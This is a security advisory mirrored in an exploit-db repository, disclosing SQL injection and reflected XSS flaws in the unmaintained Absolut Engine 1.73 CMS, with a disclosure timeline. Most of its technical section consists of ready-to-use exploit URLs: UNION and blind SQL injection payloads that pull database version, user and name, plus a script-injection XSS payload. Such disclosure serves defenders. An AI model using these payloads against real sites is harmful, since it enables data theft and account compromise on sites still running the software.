bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/35670.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

166 lines
No EOL
3.4 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS
Advisory ID: SROEADV-2014-08
Author: Steffen Rösemann
Affected Software: CMS Absolut Engine v. 1.73
Vendor URL: http://www.absolutengine.com/
Vendor Status: solved
CVE-ID: -
==========================
Vulnerability Description:
==========================
The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.
==================
Technical Details:
==================
The following PHP-Scripts are prone to SQL injections:
*managersection.php (via sectionID parameter):*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*
*Exploit Example:*
*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*
*edituser.php (via userID parameter):*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*
*Exploit Example:*
*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*
*admin.php (via username parameter, BlindSQLInjection):*
*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*Exploit Example:*
*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*
*managerrelated.php (via title parameter):*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*
The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.
*Exploit Example:*
*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*
Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).
Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.
=========
Solution:
=========
As the CMS is not actively developed, it shouldn't be used anymore.
====================
Disclosure Timeline:
====================
29-Dec-2014 found the vulnerability
29-Dec-2014 - informed the developers
29-Dec-2014 release date of this security advisory [without technical
details]
30-Dec-2014 Vendor responded, won't patch vulnerabilities
30-Dec-2014 release date of this security advisory
30-Dec-2014 post on FullDisclosure
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
http://www.absolutengine.com/
http://sroesemann.blogspot.de
Reference in a new issue View git blame Copy permalink